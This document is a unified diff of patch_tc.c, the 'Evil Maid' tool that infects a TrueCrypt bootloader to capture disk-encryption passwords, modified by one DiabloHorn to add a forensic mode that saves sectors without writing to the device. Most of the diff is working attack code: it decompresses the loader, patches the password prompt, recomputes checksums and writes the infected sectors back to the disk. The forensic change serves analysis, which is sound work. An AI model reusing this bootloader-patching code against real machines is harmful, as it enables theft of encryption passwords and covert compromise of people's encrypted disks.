DiabloHorn

--- patch_tc.c	2009-10-13 20:06:07.000000000 +0200
+++ patch_tc_modified.c	2014-03-23 22:14:49.073346732 +0100
@@ -1,3 +1,13 @@
+/*
+    Original blog post: http://theinvisiblethings.blogspot.nl/2009/10/evil-maid-goes-after-truecrypt.html
+    Original src download: http://invisiblethingslab.com/resources/evilmaid/evilmaid-src-1.0.tgz
+    Original Author: Joanna Rutkowska
+    Modified by: DiabloHorn
+
+    Slight modification to permit the saving of the sectors and the unzipped
+    second loader without modifying the original image / device
+*/
+
 #include <stdio.h>
 #include <stdlib.h>
 #include <fcntl.h>
@@ -16,6 +26,7 @@

 typedef enum {FALSE = 0, TRUE} bool;

+int do_forensically = 0;

 bool SaveSectors (
 	void* Sectors,
@@ -217,10 +228,12 @@
 		return FALSE;

 	uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
+
 	if (uCompressedLoaderSize > (uSectorsCount - 5) * SECTOR_SIZE)
 		return FALSE;

 	uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedLoaderSize);
+
 	if (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] != uChecksum)
 		return FALSE;

@@ -259,7 +272,7 @@

 	uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
 	printf ("PatchTrueCrypt(): Compressed loader size: %d bytes\n", uCompressedLoaderSize);
-
+    printf ("PatchTrueCrypt(): Saved checksum 0x%X\n", (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET]));
 	// in MBR:

 	// B9 FF XX   mov cx, 0xXXff  ; TC_BOOT_MEMORY_REQUIRED * 1024 - TC_COM_EXECUTABLE_OFFSET - 1
@@ -297,124 +310,125 @@
 	}

 	printf ("PatchTrueCrypt(): Decompression successful\n");
+    if(!do_forensically){
+	    hDecompressedLoader = open (LOADER, O_RDONLY);
+	    if (hDecompressedLoader < 0) {
+		    printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
+		    return FALSE;
+	    }
+
+	    if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
+		    printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
+		    close (hDecompressedLoader);
+		    return FALSE;
+	    }
+	    uDecompressedLoaderSize = FileStatStruct.st_size;
+
+	    printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
+
+	    if (uDecompressedLoaderSize > uLoaderMemorySize) {
+		    printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
+		    close (hDecompressedLoader);
+		    return FALSE;
+	    }
+
+	    pDecompressedLoader = malloc (uLoaderMemorySize);
+	    if (!pDecompressedLoader) {
+		    printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
+		    close (hDecompressedLoader);
+		    return FALSE;
+	    }
+	    memset (pDecompressedLoader, 0, uLoaderMemorySize);
+
+	    nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
+	    if (nbRead != uDecompressedLoaderSize) {
+		    printf
+			    ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
+			     errno);
+		    free (pDecompressedLoader);
+		    close (hDecompressedLoader);
+		    return FALSE;
+	    }

-	hDecompressedLoader = open (LOADER, O_RDONLY);
-	if (hDecompressedLoader < 0) {
-		printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
-		return FALSE;
-	}
-
-	if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
-		printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
-		close (hDecompressedLoader);
-		return FALSE;
-	}
-	uDecompressedLoaderSize = FileStatStruct.st_size;
-
-	printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
-
-	if (uDecompressedLoaderSize > uLoaderMemorySize) {
-		printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
-		close (hDecompressedLoader);
-		return FALSE;
-	}
-
-	pDecompressedLoader = malloc (uLoaderMemorySize);
-	if (!pDecompressedLoader) {
-		printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
-		close (hDecompressedLoader);
-		return FALSE;
-	}
-	memset (pDecompressedLoader, 0, uLoaderMemorySize);
-
-	nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
-	if (nbRead != uDecompressedLoaderSize) {
-		printf
-			("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
-			 errno);
-		free (pDecompressedLoader);
-		close (hDecompressedLoader);
-		return FALSE;
-	}
-
-
-	close (hDecompressedLoader);
-	unlink (LOADER);
-
-/*
-	if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
-		return FALSE;
-	}
-*/
-
-	pUncompressedPatchedLoader = NULL;
-	uPatchedLoaderMemorySize = 0;
-	if (!PatchAskPassword
-	    (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
-		pbAlreadyInfected)) {
-		printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
-		free (pDecompressedLoader);
-		return FALSE;
-	}
-
-	free (pDecompressedLoader);

-	*(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
-		ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
-
-	if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
-		free (pUncompressedPatchedLoader);
-		return FALSE;
-	}
-
-	free (pUncompressedPatchedLoader);
-
-	unlink (PATCHED_LOADER_COMPRESSED);
-
-	printf ("PatchTrueCrypt(): Compressing the patched loader\n");
-
-	if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
-		printf ("PatchTrueCrypt(): Compression failed\n");
-		return FALSE;
-	}
-
-	printf ("PatchTrueCrypt(): Compression successful\n");
-
-	hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
-	if (hCompressedPatchedLoader < 0) {
-		printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
-		return FALSE;
-	}
-
-	if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
-		printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
-		close (hCompressedPatchedLoader);
-		return FALSE;
-	}
-	uCompressedPatchedLoaderSize = FileStatStruct.st_size;
-
-
-	printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
+	    close (hDecompressedLoader);
+	    unlink (LOADER);
+

-	nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
-	if (nbRead != uCompressedPatchedLoaderSize) {
-		printf
-			("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
-			 errno);
-		close (hCompressedPatchedLoader);
-		return FALSE;
-	}
+    /*
+	    if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
+		    return FALSE;
+	    }
+    */
+
+	    pUncompressedPatchedLoader = NULL;
+	    uPatchedLoaderMemorySize = 0;
+	    if (!PatchAskPassword
+	        (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
+		    pbAlreadyInfected)) {
+		    printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
+		    free (pDecompressedLoader);
+		    return FALSE;
+	    }
+
+	    free (pDecompressedLoader);
+
+	    *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
+		    ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
+
+	    if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
+		    free (pUncompressedPatchedLoader);
+		    return FALSE;
+	    }
+
+	    free (pUncompressedPatchedLoader);
+
+	    unlink (PATCHED_LOADER_COMPRESSED);
+
+	    printf ("PatchTrueCrypt(): Compressing the patched loader\n");
+
+	    if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
+		    printf ("PatchTrueCrypt(): Compression failed\n");
+		    return FALSE;
+	    }
+
+	    printf ("PatchTrueCrypt(): Compression successful\n");
+
+	    hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
+	    if (hCompressedPatchedLoader < 0) {
+		    printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
+		    return FALSE;
+	    }
+
+	    if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
+		    printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
+		    close (hCompressedPatchedLoader);
+		    return FALSE;
+	    }
+	    uCompressedPatchedLoaderSize = FileStatStruct.st_size;
+
+
+	    printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
+
+	    nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
+	    if (nbRead != uCompressedPatchedLoaderSize) {
+		    printf
+			    ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
+			     errno);
+		    close (hCompressedPatchedLoader);
+		    return FALSE;
+	    }


-	close (hCompressedPatchedLoader);
-	unlink (PATCHED_LOADER_COMPRESSED);
+	    close (hCompressedPatchedLoader);
+	    unlink (PATCHED_LOADER_COMPRESSED);

-	uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
-	printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
-
-	*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
-	*(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
+	    uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
+	    printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);

+	    *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
+	    *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
+    }
 	return TRUE;
 }

@@ -458,11 +472,15 @@

 	printf (VER_STRING);

-	if (argc != 2) {
+	if (argc < 2) {
 		printf ("Usage: %s <target>\n", argv[0]);
 		return 1;
 	}
-
+
+    if( argc == 3){
+        do_forensically = 1;
+    }
+
 	if (!ReadFirstSectors (argv[1], SECTORS_TO_BACKUP, (char**)&pFirstSectors, &hDevice)) {
 		return 2;
 	}
@@ -499,24 +517,25 @@
 			return 5;
 		}
 	}
+    if(!do_forensically){
+	    lseek (hDevice, 0, SEEK_SET);

-	lseek (hDevice, 0, SEEK_SET);
-
-	nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
-	if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
-		printf ("Failed to update the first sectors of a device, last error %d\n", errno);
-		close (hDevice);
-		//unlink (szBackupName);
-		return FALSE;
-	}
-
-/*	if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
-		printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
-		free (pFirstSectors);
-		close (hDevice);
-		return;
-	}
-*/
+	    nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
+	    if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
+		    printf ("Failed to update the first sectors of a device, last error %d\n", errno);
+		    close (hDevice);
+		    //unlink (szBackupName);
+		    return FALSE;
+	    }
+
+    /*	if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
+		    printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
+		    free (pFirstSectors);
+		    close (hDevice);
+		    return;
+	    }
+    */
+    }
 	free (pFirstSectors);
 	close (hDevice);
 	return 0;